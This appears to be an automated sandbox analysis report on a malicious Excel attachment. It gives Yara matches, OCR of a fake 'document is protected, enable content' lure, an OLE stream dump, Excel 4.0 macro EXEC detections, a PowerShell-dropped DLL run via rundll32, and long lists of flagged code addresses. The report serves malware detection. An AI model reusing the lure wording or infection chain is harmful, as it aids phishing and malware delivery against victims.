Source: Yara match File source: 00000011.00000002.622178465.0000000000160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.445918549.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.671246977.0000000010001000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576946958.0000000000C51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492898752.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.495115795.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576607361.0000000000311000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.576860831.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.671006733.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492968280.0000000003010000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622201770.0000000000191000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.539409355.00000000000F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.670900460.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.577214555.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.537098802.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.492877344.0000000002971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.622232992.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 12 13 14 15 Previewing is not available for protected documents. 16 17
Source: Screenshot number: 4 Screenshot OCR: protected documents. 16 17 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24 25 26 27 28 29 '
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 , I 1
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 12 13 14 15 c Previewing is not available for protected documents. 16 :
Source: Screenshot number: 8 Screenshot OCR: protected documents. 16 :: You have to PresiENABLE EDITING" and "ENABLE CONTENT" buttons to prev
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 , I 11 25 26 27 28 29
Document contains OLE streams with names of living off the land binaries
Source: Attachment-2801.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .......
Source: Attachment-2801.xls.0.dr Stream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .......
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: Attachment-2801.xls Initial sample: EXEC
Source: Attachment-2801.xls Initial sample: EXEC
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00259700 9_2_00259700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00265CF9 9_2_00265CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00265040 9_2_00265040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00256083 9_2_00256083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026109E 9_2_0026109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002570ED 9_2_002570ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025911A 9_2_0025911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026A156 9_2_0026A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025F154 9_2_0025F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002641A7 9_2_002641A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00269186 9_2_00269186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026026B 9_2_0026026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025E243 9_2_0025E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026129C 9_2_0026129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025C309 9_2_0025C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026C38F 9_2_0026C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026B391 9_2_0026B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026D3C8 9_2_0026D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026542E 9_2_0026542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026A429 9_2_0026A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025B41A 9_2_0025B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0027146E 9_2_0027146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002604B8 9_2_002604B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026E498 9_2_0026E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002664F1 9_2_002664F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002544FA 9_2_002544FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002704DE 9_2_002704DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002674DD 9_2_002674DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00263512 9_2_00263512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025F58F 9_2_0025F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002645CD 9_2_002645CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026363D 9_2_0026363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026561F 9_2_0026561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00273672 9_2_00273672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00258650 9_2_00258650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025472E 9_2_0025472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025777B 9_2_0025777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00262753 9_2_00262753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025B821 9_2_0025B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00252830 9_2_00252830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00261831 9_2_00261831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00270867 9_2_00270867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00266864 9_2_00266864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025E86A 9_2_0025E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025C850 9_2_0025C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002588F4 9_2_002588F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026D8D7 9_2_0026D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002568DE 9_2_002568DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025F93D 9_2_0025F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00260946 9_2_00260946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025194C 9_2_0025194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00251950 9_2_00251950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002699AA 9_2_002699AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026C9A9 9_2_0026C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00271993 9_2_00271993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00256A1F 9_2_00256A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00259A7D 9_2_00259A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025CA43 9_2_0025CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025AB66 9_2_0025AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025BB4B 9_2_0025BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00264B56 9_2_00264B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00271B54 9_2_00271B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00257B82 9_2_00257B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00262BF6 9_2_00262BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026EBFF 9_2_0026EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00267BCA 9_2_00267BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00256C29 9_2_00256C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026CC89 9_2_0026CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025EC9B 9_2_0025EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026ACD3 9_2_0026ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00260D33 9_2_00260D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025BD0F 9_2_0025BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00268D71 9_2_00268D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00263D41 9_2_00263D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00270D5B 9_2_00270D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025FD8C 9_2_0025FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00258D95 9_2_00258D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026BE8C 9_2_0026BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026EE94 9_2_0026EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025AE9A 9_2_0025AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00256ED6 9_2_00256ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0026FF31 9_2_0026FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00252FA1 9_2_00252FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00253FB8 9_2_00253FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00251F9B 9_2_00251F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025CFCE 9_2_0025CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038E498 10_2_0038E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037EC9B 10_2_0037EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038EE94 10_2_0038EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038BE8C 10_2_0038BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00385CF9 10_2_00385CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003770ED 10_2_003770ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003874DD 10_2_003874DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037F93D 10_2_0037F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00383512 10_2_00383512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379700 10_2_00379700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00391B54 10_2_00391B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00378D95 10_2_00378D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038B391 10_2_0038B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038363D 10_2_0038363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00372830 10_2_00372830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00381831 10_2_00381831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038A429 10_2_0038A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038542E 10_2_0038542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037B821 10_2_0037B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00376C29 10_2_00376C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038561F 10_2_0038561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00376A1F 10_2_00376A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037B41A 10_2_0037B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00379A7D 10_2_00379A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00393672 10_2_00393672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038026B 10_2_0038026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0039146E 10_2_0039146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00386864 10_2_00386864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037E86A 10_2_0037E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390867 10_2_00390867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037C850 10_2_0037C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00378650 10_2_00378650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037CA43 10_2_0037CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037E243 10_2_0037E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00385040 10_2_00385040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003804B8 10_2_003804B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038129C 10_2_0038129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038109E 10_2_0038109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037AE9A 10_2_0037AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038CC89 10_2_0038CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00376083 10_2_00376083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003788F4 10_2_003788F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003864F1 10_2_003864F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003744FA 10_2_003744FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00376ED6 10_2_00376ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003904DE 10_2_003904DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003768DE 10_2_003768DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038ACD3 10_2_0038ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038D8D7 10_2_0038D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038FF31 10_2_0038FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00380D33 10_2_00380D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037472E 10_2_0037472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037911A 10_2_0037911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037BD0F 10_2_0037BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037C309 10_2_0037C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00388D71 10_2_00388D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037777B 10_2_0037777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037AB66 10_2_0037AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00390D5B 10_2_00390D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037F154 10_2_0037F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00371950 10_2_00371950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00382753 10_2_00382753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038A156 10_2_0038A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00384B56 10_2_00384B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00383D41 10_2_00383D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037194C 10_2_0037194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037BB4B 10_2_0037BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00380946 10_2_00380946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00373FB8 10_2_00373FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038C9A9 10_2_0038C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003899AA 10_2_003899AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00372FA1 10_2_00372FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003841A7 10_2_003841A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00391993 10_2_00391993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00371F9B 10_2_00371F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00377B82 10_2_00377B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038C38F 10_2_0038C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037F58F 10_2_0037F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037FD8C 10_2_0037FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00389186 10_2_00389186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038EBFF 10_2_0038EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00382BF6 10_2_00382BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0038D3C8 10_2_0038D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00387BCA 10_2_00387BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003845CD 10_2_003845CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037CFCE 10_2_0037CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00249700 11_2_00249700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00255CF9 11_2_00255CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00255040 11_2_00255040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00246083 11_2_00246083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025109E 11_2_0025109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002470ED 11_2_002470ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024911A 11_2_0024911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024F154 11_2_0024F154
